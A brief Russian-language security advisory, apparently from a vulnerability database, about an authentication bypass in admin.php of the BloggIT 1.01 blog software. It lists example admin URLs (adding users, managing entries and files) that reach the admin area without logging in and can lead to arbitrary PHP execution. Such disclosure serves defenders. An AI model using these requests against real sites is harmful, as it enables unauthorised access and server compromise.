Программа: BloggIT 1.01, возможно другие версии.

Уязвимость позволяет удаленному пользователю обойти ограничения безопасности и скомпрометировать уязвимую систему. Уязвимость существует из-за недостаточной проверки подлинности пользователя в файле admin.php. Удаленный неавторизованный пользователь может получить доступ к административной части приложения. Дальнейшая эксплуатация уязвимости может позволить злоумышленнику загрузить и выполнить произвольные PHP сценарии на целевой системе с привилегиями Web сервера.

Пример:

http://example/admin.php
http://example/admin.php?op=add_ent
http://example/admin.php?op=add_usr
http://example/admin.php?op=man_ent
http://example/admin.php?op=man_usr
http://example/admin.php?op=man_cat
http://example/admin.php?op=man_com
http://example/admin.php?op=man_fil



Оставить мнение